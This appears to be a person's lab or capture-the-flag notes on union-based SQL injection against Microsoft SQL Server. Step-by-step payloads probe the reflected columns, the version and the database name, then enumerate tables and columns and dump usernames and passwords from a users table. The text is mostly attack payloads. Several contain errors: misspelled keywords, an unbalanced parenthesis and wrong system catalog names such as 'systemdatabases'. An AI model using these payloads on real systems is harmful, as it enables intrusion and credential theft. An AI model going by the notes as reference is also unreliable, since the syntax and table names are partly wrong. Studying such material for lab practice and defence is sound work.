mssql database actual combat

MSSQL COMMAND

show databases from mssql

SQL>select name from master..sysdatabases;

name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

 

speculating echoed bit location

1' union select 1,2,3,4,5,6;-- -

echo bit at 2 and 3

mssql version detecting

1' union select 1,@@version,3,4,5,6;-- - 

confirming the current database

1' union select 1,db_name(),3,4,5,6;-- - ##error
--
except system variable,we have to use select to bring out data from master..systemdatabases
1' union select 1,(select db_name()),3,4,5,6 from master..systemdatabases;-- - ##true

exploring the table from streamio(db_name())

1' union select 1,name,id,4,5,6 from master..systemdatabases where xtype='U';-- - 
--
tips:because this table was created by user,the storage type 'xtype' is 'U' and we must specify xtype
at the time we query for table

exploring the columns from name and id 

1'union selct 1,col_name(object_id('users'),2,3,4,5,6 from systemobject;-- - X #error
--
a.we have to specify database's systemobjects that inquire data 
b.we have to remember when want to inquire columns using col_name(object_id('xx')) and id to query 
--
1' union select 1,col_name(object_id('users')),2,3,4,5,6 from streamio..systemobjects 
where id in (885578193,9051578250);-- -

extracting the data stored in columns

1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- - 

steps over

summary

the vital thing in mssql query as following:

1.two system level variable master..systemdatabases and db_name()_systemobjects

2.table query need to distinguish variable xtype ,sql server have different components like  user customized database with table named U and system level database named S

 3.if the data stored in columns that too big for echoed bit,we have to utiliz concat to bring out the data without truncation